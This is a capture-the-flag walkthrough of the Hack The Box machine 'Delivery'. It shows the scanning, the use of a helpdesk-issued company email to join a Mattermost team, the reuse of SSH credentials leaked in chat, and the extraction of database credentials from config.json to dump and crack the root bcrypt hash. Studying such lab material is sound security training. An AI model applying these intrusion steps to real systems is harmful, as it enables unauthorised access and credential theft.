Enumeration
Nmap shows three active services: SSH on port 22, a web server on port 80, and an unknown service on port 8065.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.124 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.124 -v -oN nmap_tcpPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open http Golang net/http server
|_http-title: Mattermost
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Sat, 06 Sep 2025 22:54:51 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: ng3wz85jm7byfdy83oiynb6nue
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Sun, 07 Sep 2025 00:09:04 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| GenericLines, Help, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Sat, 06 Sep 2025 22:54:51 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: c6rjcnqa6jbibeneghoi54ez6y
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Sun, 07 Sep 2025 00:08:38 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Sun, 07 Sep 2025 00:08:40 GMT
|_ Content-Length: 0
|_http-favicon: Unknown favicon MD5: 6B215BD4A98C6722601D4F8A985BF370
| http-methods:
|_ Supported Methods: GET
| http-robots.txt: 1 disallowed entry
|_/Visiting http://10.129.235.124 reveals a Delivery landing page.
The frontend appears to be a static HTML page, but the HelpDesk link redirects to http://helpdesk.delivery.htb/. We need to add this hostname to the /etc/hosts file on our local machine.
10.129.235.124 delivery.htb helpdesk.delivery.htbThe “Contact Us” link directs unregistered users to the HelpDesk. By providing a valid company email, it becomes possible to access the MatterMost server at delivery.htb:8064. It appears that open registration on MatterMost is also enabled.
Browsing to the HelpDesk subdomain reveals that it is running the osTicket support ticketing system.
Foothold
HelpDesks typically let users send emails to a temporary address in order to update the status of an open ticket. However, if the corporate domain is used for tickets, this feature could give non-employees access to @company.com email addresses. Since many cloud services accept email domains as proof of employment, this might provide access to internal services. Let’s go ahead and create a new ticket.
Clicking the Create Ticket button redirects to a success page.
When a support ticket is created, a company email address in the @delivery.htb domain is issued. We can then use this email to register a new user account.
Next, we check the status of our support ticket to see if anything has been updated.
We have received an invitation. By visiting the confirmation URL, we can access the MatterMost instance and successfully join the Internal team.
The Internal team appears to be discussing updates to the osTicket system’s theme. Within the conversation, some credentials are shared: maildeliverer:Youve_G0t_Mail!. They also mention developing a program to help prevent re-using the same passwords, with “PleaseSubscribe!” provided as a hint. Using the given credentials, we can log in via SSH as the maildeliverer user.
┌──(kali㉿kali)-[~/Delivery]
└─$ ssh maildeliverer@10.129.235.124
The authenticity of host '10.129.235.124 (10.129.235.124)' can't be established.
ED25519 key fingerprint is SHA256:AGdhHnQ749stJakbrtXVi48e6KTkaMj/+QNYMW+tyj8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.235.124' (ED25519) to the list of known hosts.
maildeliverer@10.129.235.124's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
8752<SNIP>15aaPrivilege Escalation
During filesystem enumeration, the MatterMost configuration file was located at /opt/mattermost/config/config.json. Reviewing this file reveals the SqlSettings section, which contains the database credentials.
cat /opt/mattermost/config/config.jsonSqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Cra<SNIP>_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},On checking the internal ports, we can see that the SQL port is open.
maildeliverer@Delivery:~$ ss -ntlp
<SNIP>
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* Using the discovered credentials, we can now log in to the mattermost MySQL database.
maildeliverer@Delivery:~$ mysql -u mmuser -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 74
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedFurther enumeration of the database allows us to extract the root hash from the Users table.
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
<SNIP>
| Users |
+------------------------+
46 rows in set (0.000 sec)
MariaDB [mattermost]> select * from Users;
<SNIP>
root | $2a$10$VM6E<SNIP>gjjO | NULL | | root@delivery.htb
<SNIP> From our earlier access to the Internal team, we recall the MatterMost root user warning about not reusing passwords, specifically mentioning the word “PleaseSubscribe!”. We can generate a wordlist based on “PleaseSubscribe!” with Hashcat and then use John the Ripper to crack the root hash.
┌──(kali㉿kali)-[~/Delivery]
└─$ echo PleaseSubscribe! | hashcat -r /usr/share/hashcat/rules/best64.rule --stdout
PleaseSubscribe!
!ebircsbuSesaelP
PLEASESUBSCRIBE!
pleaseSubscribe!
PleaseSubscribe!0
<SNIP>This generates a small wordlist, which we save to a file named wordlist. We then use John to crack the root hash with this wordlist.
┌──(kali㉿kali)-[~/Delivery]
└─$ john root_hash --wordlist=wordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<SNIP> (?)
1g 0:00:00:00 DONE (2025-09-07 13:50) 2.857g/s 102.8p/s 102.8c/s 102.8C/s PleaseSubscribe!12..PleaseSubscrio
Use the "--show" option to display all of the cracked passwords reliably
Session completed. The hash is successfully cracked, allowing us to use the root credentials to log in as the root user on the target machine.
maildeliverer@Delivery:~$ su root
Password:
root@Delivery:/home/maildeliverer# cd /root
root@Delivery:~# ls
mail.sh note.txt py-smtp.py root.txt
root@Delivery:~# cat root.txt
47d9<SNIP>2393References
- https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c
- HTB Official Walkthrough for Delivery